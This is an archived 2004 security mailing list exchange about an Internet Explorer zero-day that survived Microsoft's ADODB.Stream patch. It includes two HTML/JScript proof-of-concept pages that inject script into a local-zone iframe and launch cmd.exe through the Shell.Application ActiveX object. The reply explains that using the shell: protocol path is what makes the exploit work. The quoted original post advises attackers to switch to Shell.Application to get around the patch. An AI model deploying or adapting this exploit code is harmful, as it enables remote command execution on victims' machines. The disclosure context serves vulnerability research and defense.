lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <000501c4610b$02212e40$3200000a@alex>
Date: Sat, 03 Jul 2004 16:35:32 +0200
From: Jelmer <jkuperus@...net.nl>
To: liudieyu@...rella.name, bugtraq@...urityfocus.com,
   NTBugtraq@...tserv.ntbugtraq.com, full-disclosure@...ts.netsys.com
Subject: RE: THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH


Well it's not quite as easy as you make it sound
I think you only took a look at http-equiv's example I posted to full
disclosure and based your post on that. You see this:


--snip--

<iframe src="c:\windows\web\tip.htm"
style="width:400px;height:200px;"></iframe>

<textarea id="code" style="display:none;">
  injected.
  <script language="JScript" DEFER>
    alert('attempting injection');
    var obj=new ActiveXObject("Shell.Application");
    obj.ShellExecute("cmd.exe","/c pause");
  </script>
</textarea>

<script language="javascript">
    
    function doit() {
      document.frames[0].document.body.insertAdjacentHTML('afterBegin',
document.all.code.value);
    }
    setTimeout("doit()", 2000);
</script>

--snip--

Doesn't work, It gives an access denied exception
But this..


--snip--

<iframe src="shell:windows\web\tip.htm"
style="width:400px;height:200px;"></iframe>


<textarea id="code" style="display:none;">
  injected.
  <script language="JScript" DEFER>
    alert('attempting injection');
    var obj=new ActiveXObject("Shell.Application");
    obj.ShellExecute("cmd.exe","/c pause");
  </script>
</textarea>


<script language="javascript">
    
    function doit() {
      document.frames[0].document.body.insertAdjacentHTML('afterBegin',
document.all.code.value);
    }
    setTimeout("doit()", 2000);
</script>

--snip--


..does, notice the subtle difference.
The iframe in the 2nd example is set to shell:windows\web\tip.htm 
Instead of the hard coded c:\windows\web\tip.htm
And it works. It was http-equiv whom probably by a mixture of luck and gut
instinct thru experience found this out when we where doing some mailing
back and forth to tackle some unrelated problem
If you'd actually tried to exploit it you would have known this



-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of
liudieyu@...rella.name
Sent: zaterdag 3 juli 2004 3:28
To: bugtraq@...urityfocus.com; NTBugtraq@...tserv.ntbugtraq.com;
full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] THE INSIDER VULNERABILITY STILL WORKS AFTER
TODAY'S PATCH



FROM: Liu Die Yu - http://umbrella.name/
TO  : bugtraq@...urityfocus.com, NTBugtraq@...tserv.ntbugtraq.com,
full-disclosure@...ts.netsys.com
SUBJ: THE INSIDER VULNERABILITY STILL WORKS AFTER TODAY'S PATCH
DATE: 2004/07/03 UTC+800
BODY:

[background]
the latest 0day remote compromise exploit for internet explorer was found
being used in the wild. :-)

"the-insider" exploit was first noticed by the-insider:
http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclos
ure_message-2004060050
and then documented by jelmer:
http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclos
ure_message-2004060124
http://62.131.86.111/analysis.htm 

microsoft just released:
Critical Update for Microsoft Data Access Components - Disable ADODB.Stream
object from Internet Explorer (KB870669)
http://www.microsoft.com/downloads/details.aspx?FamilyID=4D056748-C538-46F6-
B7C8-2FBFD0D237E3&DisplayLang=en
which kills the old exploit.

[FIX FOR THE PATCH]
use Shell.Application instead.

[service]
both "attack service"(finding bugs) and "defense service"(securing systems):
http://umbrella.name/

[greetings]
malware( http://www.malware.com/ ) who found Shell.Application.

[signature]
LIUDIEYU
liudieyu AT umbrella . name




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ